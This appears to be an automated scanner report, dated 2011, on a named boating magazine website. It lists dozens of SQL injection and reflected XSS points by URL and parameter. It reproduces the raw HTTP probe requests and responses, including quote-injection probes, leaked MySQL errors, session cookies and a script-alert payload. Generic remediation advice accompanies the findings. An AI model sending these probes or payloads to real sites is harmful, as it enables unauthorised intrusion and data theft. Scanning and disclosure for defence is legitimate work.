soundingsonline.com, Joomla, XSS, SQL Injection, Exploit

SQL Injection, XSS in soundingsonline.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 10:54:08 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

1.3. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

1.4. http://www.soundingsonline.com/archives ['"--> parameter]

1.5. http://www.soundingsonline.com/archives ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B)%3C/script%3E parameter]

1.6. http://www.soundingsonline.com/archives [User-Agent HTTP header]

1.7. http://www.soundingsonline.com/archives [d4dad6935f632ac35975e3001dc7bbe8 cookie]

1.8. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

1.9. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

1.10. http://www.soundingsonline.com/archives [s_lv_s cookie]

1.11. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

1.12. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

1.13. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

1.14. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

1.15. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

1.16. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

1.17. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

1.18. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

1.19. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

1.20. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

1.21. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

1.22. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

1.23. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

1.24. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

1.25. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

1.26. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

1.27. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

1.28. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1]

1.29. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2]

1.30. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter]

1.31. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter]

1.32. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2]

1.33. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3]

1.34. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4]

1.35. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter]

1.36. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

1.37. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

1.38. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

1.39. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

1.40. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

1.41. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

1.42. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

1.43. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

1.44. http://www.soundingsonline.com/index.php [Itemid parameter]

1.45. http://www.soundingsonline.com/index.php [chronoformname parameter]

1.46. http://www.soundingsonline.com/index.php [id parameter]

1.47. http://www.soundingsonline.com/index.php [layout parameter]

1.48. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

1.49. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

1.50. http://www.soundingsonline.com/index.php [option parameter]

1.51. http://www.soundingsonline.com/index.php [view parameter]

1.52. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

1.53. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

1.54. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

1.55. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

1.56. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

1.57. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

1.58. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

1.59. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

1.60. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

1.61. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

1.62. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

1.63. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]

1.64. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

1.65. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

2.2. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

2.3. http://www.soundingsonline.com/archives ['"--> parameter]

2.4. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

2.5. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

2.6. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

2.7. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

2.8. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

2.9. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

2.10. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

2.11. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

2.12. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

2.13. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

2.14. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

2.15. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

2.16. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

2.17. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

2.18. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

2.19. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

2.20. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

2.21. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

2.22. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

2.23. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

2.24. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

2.25. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

2.26. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

2.27. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

2.28. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

2.29. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

2.30. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

2.31. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_x parameter]

2.32. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_y parameter]

2.33. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_height parameter]

2.34. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_width parameter]

2.35. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_bgcolor parameter]

2.36. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_margin parameter]

2.37. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_opacity parameter]

2.38. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_width parameter]

2.39. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_border parameter]

2.40. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_height parameter]

2.41. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_margin parameter]

2.42. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_width parameter]

2.43. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_x parameter]

2.44. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_y parameter]

2.45. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_interval parameter]

2.46. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_speed parameter]

2.47. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_slide_type parameter]

2.48. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_text_type parameter]

2.49. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [autoanimation parameter]

2.50. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [base_bgcolor parameter]

2.51. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [clickable_slides parameter]

2.52. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_x parameter]

2.53. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [interface_y parameter]

2.54. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [mid parameter]

2.55. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [text_block_opacity parameter]

2.56. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border parameter]

2.57. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color parameter]

2.58. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_border_color_inactive parameter]

2.59. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_margin parameter]

2.60. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_width parameter]

2.61. http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [img_width parameter]

2.62. http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [modid parameter]

2.63. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

2.64. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

2.65. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

2.66. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

2.67. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

2.68. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

2.69. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

2.70. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

2.71. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

2.72. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

2.73. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

2.74. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

3. SQL statement in request parameter

4. Cross-domain Referer leakage

4.1. http://www.soundingsonline.com/archives

4.2. http://www.soundingsonline.com/component/chronocontact/

4.3. http://www.soundingsonline.com/index.php

4.4. http://www.soundingsonline.com/index.php

5. Cross-domain script include

5.1. http://www.soundingsonline.com/

5.2. http://www.soundingsonline.com/about-us

5.3. http://www.soundingsonline.com/advertise

5.4. http://www.soundingsonline.com/archives

5.5. http://www.soundingsonline.com/boat-shop

5.6. http://www.soundingsonline.com/boat-shop/know-how

5.7. http://www.soundingsonline.com/boat-shop/new-boats

5.8. http://www.soundingsonline.com/boat-shop/new-gear

5.9. http://www.soundingsonline.com/boat-shop/on-powerboats

5.10. http://www.soundingsonline.com/boat-shop/on-sailboats

5.11. http://www.soundingsonline.com/boat-shop/q-a-a

5.12. http://www.soundingsonline.com/boat-shop/sea-savvy

5.13. http://www.soundingsonline.com/boat-shop/tech-talk

5.14. http://www.soundingsonline.com/boat-shop/used-boat-review

5.15. http://www.soundingsonline.com/calendar

5.16. http://www.soundingsonline.com/career-opportunities

5.17. http://www.soundingsonline.com/columns-blogs

5.18. http://www.soundingsonline.com/columns-blogs/bay-tripper

5.19. http://www.soundingsonline.com/columns-blogs/books

5.20. http://www.soundingsonline.com/columns-blogs/new-england-fishing

5.21. http://www.soundingsonline.com/columns-blogs/under-way

5.22. http://www.soundingsonline.com/component/chronocontact/

5.23. http://www.soundingsonline.com/component/content/article/237622

5.24. http://www.soundingsonline.com/contact-us

5.25. http://www.soundingsonline.com/features

5.26. http://www.soundingsonline.com/features/destinations

5.27. http://www.soundingsonline.com/features/in-depth

5.28. http://www.soundingsonline.com/features/justyesterday

5.29. http://www.soundingsonline.com/features/lifestyle

5.30. http://www.soundingsonline.com/features/profiles

5.31. http://www.soundingsonline.com/features/technical

5.32. http://www.soundingsonline.com/features/type-of-boat

5.33. http://www.soundingsonline.com/index.php

5.34. http://www.soundingsonline.com/more/digital-publications

5.35. http://www.soundingsonline.com/more/the-masters-series

5.36. http://www.soundingsonline.com/news

5.37. http://www.soundingsonline.com/news/coastwise

5.38. http://www.soundingsonline.com/news/dispatches

5.39. http://www.soundingsonline.com/news/home-waters

5.40. http://www.soundingsonline.com/news/mishaps-a-rescues

5.41. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

5.42. http://www.soundingsonline.com/news/sailing

5.43. http://www.soundingsonline.com/news/todays-top-stories

5.44. http://www.soundingsonline.com/resources

5.45. http://www.soundingsonline.com/site-map

5.46. http://www.soundingsonline.com/subscription-services

5.47. http://www.soundingsonline.com/subscription-services/preview-current-issue

5.48. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

6. Cookie without HttpOnly flag set

6.1. http://www.soundingsonline.com/

6.2. http://www.soundingsonline.com/archives

7. Email addresses disclosed

7.1. http://www.soundingsonline.com/

7.2. http://www.soundingsonline.com/about-us

7.3. http://www.soundingsonline.com/advertise

7.4. http://www.soundingsonline.com/archives

7.5. http://www.soundingsonline.com/boat-shop

7.6. http://www.soundingsonline.com/boat-shop/know-how

7.7. http://www.soundingsonline.com/boat-shop/new-boats

7.8. http://www.soundingsonline.com/boat-shop/new-gear

7.9. http://www.soundingsonline.com/boat-shop/on-powerboats

7.10. http://www.soundingsonline.com/boat-shop/on-sailboats

7.11. http://www.soundingsonline.com/boat-shop/q-a-a

7.12. http://www.soundingsonline.com/boat-shop/sea-savvy

7.13. http://www.soundingsonline.com/boat-shop/tech-talk

7.14. http://www.soundingsonline.com/boat-shop/used-boat-review

7.15. http://www.soundingsonline.com/calendar

7.16. http://www.soundingsonline.com/career-opportunities

7.17. http://www.soundingsonline.com/columns-blogs

7.18. http://www.soundingsonline.com/columns-blogs/bay-tripper

7.19. http://www.soundingsonline.com/columns-blogs/books

7.20. http://www.soundingsonline.com/columns-blogs/new-england-fishing

7.21. http://www.soundingsonline.com/columns-blogs/under-way

7.22. http://www.soundingsonline.com/component/chronocontact/

7.23. http://www.soundingsonline.com/component/content/article/237622

7.24. http://www.soundingsonline.com/contact-us

7.25. http://www.soundingsonline.com/features

7.26. http://www.soundingsonline.com/features/destinations

7.27. http://www.soundingsonline.com/features/in-depth

7.28. http://www.soundingsonline.com/features/justyesterday

7.29. http://www.soundingsonline.com/features/lifestyle

7.30. http://www.soundingsonline.com/features/profiles

7.31. http://www.soundingsonline.com/features/technical

7.32. http://www.soundingsonline.com/features/type-of-boat

7.33. http://www.soundingsonline.com/index.php

7.34. http://www.soundingsonline.com/more/digital-publications

7.35. http://www.soundingsonline.com/more/the-masters-series

7.36. http://www.soundingsonline.com/news

7.37. http://www.soundingsonline.com/news/coastwise

7.38. http://www.soundingsonline.com/news/dispatches

7.39. http://www.soundingsonline.com/news/home-waters

7.40. http://www.soundingsonline.com/news/mishaps-a-rescues

7.41. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

7.42. http://www.soundingsonline.com/news/sailing

7.43. http://www.soundingsonline.com/news/todays-top-stories

7.44. http://www.soundingsonline.com/resources

7.45. http://www.soundingsonline.com/s_code.js

7.46. http://www.soundingsonline.com/site-map

7.47. http://www.soundingsonline.com/subscription-services

7.48. http://www.soundingsonline.com/subscription-services/preview-current-issue

7.49. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

8. HTML does not specify charset

9. Content type incorrectly stated



1. SQL injection  next
There are 65 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=hhaihbhl84hkvcra7pfqf1cd13; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.2. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about-us?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /about-us?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.3. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /advertise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /advertise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.4. http://www.soundingsonline.com/archives ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives

Issue detail

The '"--></style></script><script>alert(0x001E2B)</script> parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '"--></style></script><script>alert(0x001E2B)</script> parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script>' HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:29:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=2autr3bra1c4n8hi6pofo0fot1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
